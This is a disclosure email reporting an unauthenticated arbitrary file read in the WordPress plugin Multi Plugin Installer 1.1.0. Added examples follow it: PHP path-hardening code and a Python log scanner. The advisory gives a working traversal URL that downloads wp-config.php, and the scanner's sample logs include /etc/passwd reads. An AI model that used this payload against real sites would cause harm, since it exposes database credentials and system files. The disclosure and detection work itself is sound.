Subject: Arbitrary file read in Multi Plugin Installer 1.1.0
Date: Mon, 24 Aug 2015 12:19:52 +0200

Hello,

Plugin: Multi Plugin Installer 1.1.0 https://wordpress.org/plugins/multi-plugin-installer/

1. Arbitrary file read

Unauthenticated attackers can read arbitrary files from the web server's filesystem: the `filepath` and `filename` parameters of `mpi_download.php` are used to build the path of the file that is sent back, without any directory traversal check or authentication.

Method: GET
URL: http://localhost/wp-content/plugins/multi-plugin-installer/mpi_download.php?filepath=../../../&filename=wp-config.php
Vulnerable parameters: filepath, filename

Example PHP callstack:
multi-plugin-installer/mpi_download.php:117
mpi_download_file   [/multi-plugin-installer/mpi_download.php:88]
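As an added example, not the plugin's own code, here is how the download path handling can be hardened in PHP: the requested path is canonicalised with realpath() and must stay under one fixed base directory, the filename may not carry a directory component, and NUL bytes are rejected. The function name, the base directory under WP_CONTENT_DIR and the capability check are assumptions for the example.

```php
<?php
// Added example (not the plugin's code): confine filepath/filename to a base
// directory. All names below are hypothetical.

/**
 * Resolve $filepath/$filename under $base_dir.
 * Returns the canonical absolute path, or null if the request escapes the
 * base directory, contains NUL bytes, or the file does not exist.
 */
function safe_download_path(string $base_dir, string $filepath, string $filename): ?string
{
    // The filename must be a bare name: no "../", no "/", no empty string.
    if ($filename === '' || $filename !== basename($filename)) {
        return null;
    }
    // NUL bytes can truncate paths in lower-level calls; refuse them early.
    if (strpos($filepath, "\0") !== false || strpos($filename, "\0") !== false) {
        return null;
    }
    $base = realpath($base_dir);
    if ($base === false) {
        return null; // base directory misconfigured
    }
    // realpath() collapses "..", "." and symlinks, so "../../../wp-config.php"
    // becomes the real location of wp-config.php, which the prefix check below rejects.
    $target = realpath($base . DIRECTORY_SEPARATOR . $filepath . DIRECTORY_SEPARATOR . $filename);
    if ($target === false) {
        return null; // no such file
    }
    // Compare with the trailing separator included, so that a sibling such as
    // "<base>2/secret" is not accepted as a child of "<base>".
    if (strncmp($target, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $target;
}

// Hypothetical usage: only installers may download, and only from one directory.
if (!function_exists('current_user_can') || !current_user_can('install_plugins')) {
    http_response_code(403);
    exit('Forbidden');
}
$base_dir = WP_CONTENT_DIR . '/uploads/mpi';   // assumed download directory
$path = safe_download_path($base_dir, $_GET['filepath'] ?? '', $_GET['filename'] ?? '');
if ($path === null) {
    http_response_code(400);
    exit('Invalid file request');
}
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . basename($path) . '"');
readfile($path);
```

The prefix check after realpath() is the part that matters: string filtering of `..` alone misses encoded and symlink variants, whereas comparing the canonical result against the canonical base directory covers all of them. The capability check addresses the second half of the finding, that the endpoint is reachable without authentication.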

Verification (download wp-config.php):
http://localhost/wp-content/plugins/multi-plugin-installer/mpi_download.php?filepath=../../../&filename=wp-config.php
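Requests of this shape are easy to pick out of web server logs. The following Python script is an added example, not part of the advisory, that scans Apache-style access-log lines for requests to mpi_download.php whose `filepath` or `filename` parameters contain traversal sequences, absolute paths, NUL bytes, or percent-encoded variants of those. The log lines and IP addresses are constructed; the endpoint path is the one from the advisory.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (Apache combined format), not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [24/Aug/2015:12:19:52 +0200] "GET /wp-content/plugins/multi-plugin-installer/mpi_download.php?filepath=../../../&filename=wp-config.php HTTP/1.1" 200 3112 "-" "curl/7.43.0"
203.0.113.5 - - [24/Aug/2015:12:20:01 +0200] "GET /wp-content/plugins/multi-plugin-installer/mpi_download.php?filepath=..%2F..%2F..%2F&filename=wp-config.php HTTP/1.1" 200 3112 "-" "curl/7.43.0"
198.51.100.7 - - [24/Aug/2015:12:21:10 +0200] "GET /wp-content/plugins/multi-plugin-installer/mpi_download.php?filepath=uploads/&filename=plugin.zip HTTP/1.1" 200 54321 "-" "Mozilla/5.0"
198.51.100.7 - - [24/Aug/2015:12:22:00 +0200] "GET /wp-content/plugins/multi-plugin-installer/mpi_download.php?filepath=/etc/&filename=passwd HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
192.0.2.9 - - [24/Aug/2015:12:23:00 +0200] "GET /index.php HTTP/1.1" 200 100 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
ENDPOINT = "/wp-content/plugins/multi-plugin-installer/mpi_download.php"
# A ".." path component, delimited by a slash/backslash or string boundary.
TRAVERSAL = re.compile(r'(^|[\\/])\.\.([\\/]|$)')


def _decode(value: str) -> str:
    """Percent-decode repeatedly (bounded) so double-encoded input is normalised."""
    for _ in range(3):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_suspicious(params: dict) -> bool:
    """True if filepath/filename carry traversal, an absolute path, a NUL byte,
    or a filename with a directory component."""
    for key in ("filepath", "filename"):
        for raw in params.get(key, []):
            value = _decode(raw)
            if "\x00" in value or TRAVERSAL.search(value) or value.startswith(("/", "\\")):
                return True
            if key == "filename" and ("/" in value or "\\" in value):
                return True
    return False


def scan_log(text: str) -> list:
    """Return one record per suspicious request to the download endpoint."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if url.path != ENDPOINT:
            continue
        params = parse_qs(url.query, keep_blank_values=True)
        if is_suspicious(params):
            hits.append({
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "status": int(m.group("status")),
                "filepath": params.get("filepath", [""])[0],
                "filename": params.get("filename", [""])[0],
            })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        # A 200 status on a flagged request means the file was actually served.
        print(f'{hit["ts"]} {hit["ip"]} status={hit["status"]} '
              f'filepath={hit["filepath"]!r} filename={hit["filename"]!r}')
```

The status code is kept in each record because a flagged request answered with 200 indicates a successful read rather than an attempt, which changes the incident response priority. parse_qs() decodes one layer of percent-encoding and _decode() handles further layers, so `%2e%2e%2f` and `%252e%252e%252f` are both normalised before the traversal check.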

--
Regards,
Marcin Probola